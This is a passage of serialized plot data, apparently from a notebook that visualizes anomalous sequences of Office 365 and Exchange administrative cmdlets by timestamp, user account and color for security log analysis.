BxvbRAaZbT9nym6baQuoP2fKbptpC6g/iY+KUFZE/T5nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD/+10yLIUEWP/7XTIshQRY/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP7kzgspBKhU/Z8pum2kLqD9nym6baQuoPzPMHyOt0Ts/M8wfI63ROz8zzB8jrdE7PwKauiszdhA/BlI6ubqfPj9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP2fKbptpC6g/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/Z8pum2kLqD+5U0mWClemP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP7lTSZYKV6Y/x6Zf1LvJsz/nmqaw4HdEP8emX9S7ybM/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD8=\",\"dtype\":\"float64\",\"shape\":[154]},\"time_col\":[\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-19 16:46:51+00:00\",\"2020-05-19 22:48:50+00:00\",\"2020-05-20 04:50:35+00:00\",\"2020-05-20 10:52:47+00:00\",\"2020-05-20 16:54:39+00:00\",\"2020-05-20 22:56:57+00:00\",\"2020-05-21 04:58:21+00:00\",\"2020-05-21 10:59:57+00:00\",\"2020-05-21 13:00:51+00:00\",\"2020-05-21 19:02:18+00:00\",\"2020-05-21 22:52:47+00:00\",\"2020-05-22 04:54:26+00:00\",\"2020-05-22 10:58:25+00:00\",\"2020-03-24 14:56:52+00:00\",\"2020-03-24 15:05:18+00:00\",\"2020-03-24 15:08:48+00:00\",\"2020-03-24 15:22:13+00:00\",\"2020-03-24 15:54:15+00:00\",\"2020-03-24 16:44:25+00:00\",\"2020-03-24 17:00:41+00:00\",\"2020-03-26 18:06:26+00:00\",\"2020-03-26 18:41:40+00:00\",\"2020-03-26 18:44:40+00:00\",\"2020-03-26 18:53:51+00:00\",\"2020-03-26 19:11:11+00:00\",\"2020-03-26 19:18:22+00:00\",\"2020-03-26 19:25:24+00:00\",\"2020-03-26 19:33:04+00:00\",\"2020-03-26 19:42:54+00:00\",\"2020-03-26 22:40:30+00:00\",\"2020-03-27 14:34:51+00:00\",\"2020-03-27 14:59:24+00:00\",\"2020-03-27 15:12:37+00:00\",\"2020-03-27 15:15:11+00:00\",\"2020-03-27 15:21:28+00:00\",\"2020-03-27 15:37:57+00:00\",\"2020-03-27 16:09:20+00:00\",\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1417\"},\"selection_policy\":{\"id\":\"1418\"}},\"id\":\"1362\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"formatter\":{\"id\":\"1385\"},\"ticker\":{\"id\":\"1380\"}},\"id\":\"1379\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1426\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1430\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1379\"},{\"id\":\"1384\"}],\"center\":[{\"id\":\"1382\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1391\"}],\"title\":{\"id\":\"1369\"},\"toolbar\":{\"id\":\"1383\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1371\"},\"x_scale\":{\"id\":\"1375\"},\"y_range\":{\"id\":\"1373\"},\"y_scale\":{\"id\":\"1377\"}},\"id\":\"1368\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"TimeGenerated_min\":{\"__ndarray__\":\"AIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAaPL1IXdCAICHSt0id0IAAAUB8iJ3QgCAF7QGI3dCAIDBbRsjd0IAgIkiMCN3QgCAqt1EI3dCAICci1kjd0IAgHw8biN3QgCAeyd1I3dCAAAp1okjd0IAgGEGlyN3QgAA/berI3dCAIDGi8Ajd0IAAHK90BB3QgAA+zjREHdCAABAbNEQd0IAgMgw0hB3QgCABQbUEHdCAIDi5NYQd0IAgCrT1xB3QgAAzWGAEXdCAADqZYIRd0IAANyRghF3QgCAYRiDEXdCAIBJFoQRd0IAAIN/hBF3QgAAiuaEEXdCAADYVoURd0IAAOPmhRF3QgAAcxCQEXdCAIAvrMYRd0IAAM4TyBF3QgCAaNXIEXdCAIAB+8gRd0IAAAxXyRF3QgCAgEjKEXdCAAA4FMwRd0IAAHsu5hJ3QgCAS/h1E3dCAACt+aETd0IAALE5sxN3QgAAnWazE3dCAAA5n0wUd0IAgFNMwxR3QgAAQ4TpFHdCAICmY+oUd0IAAOKi6hR3QgAAVwIMFXdCAAC34mEVd0IAgNr1aRV3QgAAdweqFXdCAIDBgqoVd0IAAAfqqhV3QgCAyrmrFXdCAID976sVd0IAAMmOrRV3QgAAf8StFXdCAAC/9/0Vd0IAgGs5/hV3QgAABCX/FXdCAIC2Zf8Vd0IAAOyl/xV3QgAAnFkAFndCAACYKgEWd0IAAA8mAhZ3QgCA2UG9F3dCAIBPmccXd0IAABM8Dhh3QgCA34kZGHdCAADzxlIYd0IAACLxYhh3QgCAxFFsGHdCAIBZFp8Yd0IAANb/rhh3QgAA3/q5GHdCAICw0AUZd0IAAFGZWBl3QgCAHAJjGXdCAICF+P0Zd0IAgNddWhp3QgAAPOSPGndCAABuvaIad0IAgOlirBp3QgCAGsX/GndCAACGz0Ubd0IAgNqtURt3QgAA5jiaG3dCAADJcfYbd0IAALxTZxx3QgAAn8qPHHdCAIBo2pocd0IAABY00hx3QgAAZ3zjHHdCAIA8E+0cd0IAAGUE/hx3QgCAAoNSHXdCAAA8NSwed0IAAJXzNx53QgCAy8NbHndCAICiMlwed0IAAOXSXR53QgCA1MN6HndCAABTTn4ed0IAALJXJB93QgCAb3UtH3dCAICo7nUfd0IAAK9DFyB3QgAAPoIhIHdCAAAq/Q4hd0IAgC4eGSF3QgAA+vRkIXdCAADabMEhd0IAAArWwyF3QgCAxovMIXdCAICUP+Ehd0IAgGjy9SF3QgCAA3YJIndCAIBE/Qkid0IAgHVRDCJ3QgAAmgEhIndCAIA7sjUid0IAAE5lSiJ3QgCA0RpfIndCAIAXUHAid0IAgEDJcyJ3QgCAFTh7IndCAIDU8YQid0IAgLPzjyJ3QgCAiDKfIndCAAC7b6oid0IAgG7isyJ3QgCATZ21IndCAADCscUid0IAgK0nxiJ3QgCAm5vIIndCAIBdRsoid0IAgMMF0iJ3QgAAyN/SIndCAACcENMid0IAAHN/0yJ3QgCAUKTTIndCAACTzdMid0IAAMsX1CJ3QgAAXU3VIndCAIB1fdUid0I=\",\"dtype\":\"float64\",\"shape\":[154]},\"UserId\":[\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,11,15,19,23,27,31,35,39,42,45,46,49,54,128,130,131,132,134,138,139,142,147,148,149,150,151,152,153,154,157,158,160,161,162,163,165,166,167,169,170,172,173,174,175,177,178,179,180,181,183,184,186,188,189,190,191,192,193,194,196,197,198,199,201,203,205,206,208,210,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,229,230,231,232,235,238,240,241,242,243,244,247,254,255,257,258,259,261,263,267,268,272,275,277,291,293,299,307,308,309,313,320,322,323,326,329,335,339,344,349,350,352,354,357,360,362,366,367,374,375,378,383,387,388,389,391,392,393,394,396,397],\"rarest_window3\":[[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-Mailbox\",\"Set-Mailbox\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-App\",\"New-App\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ExchangeAssistanceConfig\",\"Set-AdminAuditLogConfig\",\"Set-TenantObjectVersion\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Set-ExchangeAssistanceConfig\",\"Set-TransportConfig\",\"Set-RecipientEnforcementProvisioningPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy